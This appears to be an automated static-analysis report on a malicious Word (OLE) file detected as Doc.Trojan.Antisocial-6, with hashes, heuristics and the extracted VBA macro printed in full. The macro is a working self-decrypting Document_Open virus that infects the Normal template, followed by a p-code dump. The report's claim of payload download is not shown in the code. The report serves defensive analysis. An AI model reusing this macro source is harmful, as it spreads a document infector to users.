Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e569b4ccb925985…

MALICIOUS

Office (OLE)

50.0 KB Created: 1999-06-14 18:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 886e278b8797c5b960912dc6b3ba07ab SHA-1: c9843c22ef8e7aac00fd890f70b145503e0086ed SHA-256: 3e569b4ccb925985b18796ca706c173f2ebd0e64e117df0e9e2b014d5a97a49a
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for malicious documents. The macros are obfuscated and appear to be designed to download and execute a secondary payload. The ClamAV detection further confirms the malicious nature of the file.

Heuristics 3

  • ClamAV: Doc.Trojan.Antisocial-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antisocial-6
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7857 bytes
SHA-256: 574c1d92765deb25fd135aad0b39b412770126a02c11e5fe7a25f5ec0b427d1f
Detection
ClamAV: Doc.Trojan.Antisocial-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
If MacroContainer.FullName = ActiveDocument.FullName Then GoTo ADD Else GoTo NDD
NDD: For d = 11 To NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
F = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - F: C$ = C$ & Chr(B$): Next X: A = C$
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End
ADD: For d = 11 To ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
F = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - F: C$ = C$ & Chr(B$): Next X: A = C$
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End Sub
'6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Ut&Kxxux&Xky{sk&Tk~z@&IussgtjHgxy.(Zuury(/4Iutzxury.(Sgixu(/4Jkrkzk
'5Tuyntsx3Xf{jStwrfqUwtruy%B%5?%Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5
'5Nk%If~-St|.%B%6%Ymjs%X~xyjr3Uwn{fyjUwtknqjXywnsl-'H?aFzytwzs3nsk'1%'Fzytwzs'1%'Tujs'.%B%'Ijqywjj%4^%H?a'
'3Iru#g#@#44#Wr#PdfurFrqwdlqhu1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh1FrxqwRiOlqhv=#F'#@#%%
'3L#@#+PdfurFrqwdlqhu1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh1Olqhv+g/#4,,
'7M'D'Pu{/Yuk'1'?0'2'8A'Mvy'_'D'8'[v'Slu/P0A'I+'D'Hzj/Tpk/P3'_3'800'2'MA'J+'D'J+'-'Joy/I+0A'Ul {'_A'H'D'J+
'1NbdspDpoubjofs/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/SfqmbdfMjof!e-!#(#!'!G!'!B;!Ofyu!e
'7Vwlu')JAcIl{yh€5pup)'Mvy'V|{w|{'Hz'*8A'Wypu{'*83'ThjyvJvu{hpuly5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Spulz/83'ThjyvJvu{hpuly5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Jv|u{VmSpulz0A'Jsvzl'*8
'7Uvyths[ltwsh{l5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Klsl{lSpulz'83'Uvyths[ltwsh{l5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Jv|u{VmSpulz
'6Gizo|kJui{sktz4\HVxupkiz4\HIusvutktzy4Ozks.7/4IujkSuj{rk4JkrkzkRotky&72&Gizo|kJui{sktz4\HVxupkiz4\HIusvutktzy4Ozks.7/4IujkSuj{rk4Iu{tzUlRotky
'1OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Cfusbz/joj#*
'4EgxmziHsgyqirx2ZFTvsnigx2ZFGsqtsrirxw2Mxiq,5-2GshiQshypi2EhhJvsqJmpi$,&G>`Fixve}2mrm&-
'7Hj{p}lKvj|tlu{5Zh}lHz'MpslUhtlADHj{p}lKvj|tlu{5M|ssUhtlA'Luk'Z|i
'7.Il{yh€…I€…S€z…Rv}pjR…Olssv…]_lyz…Huk…H]lyz

' Processing file: /opt/analyzer/scan_staging/ca847bd633a84f9b9039da85245a5c4a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 18446 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #1:
' 	Ld MacroContainer 
' 	MemLd FullName 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo ADD 
' 	Else 
' 	BoSImplicit 
' 	GoTo NDD 
' 	EndIf 
' Line #2:
' 	Label NDD 
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	LitDI2 0x000B 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St C$ 
' Line #3:
' 	Ld d 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #4:
' 	Ld I 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	St False 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld False 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.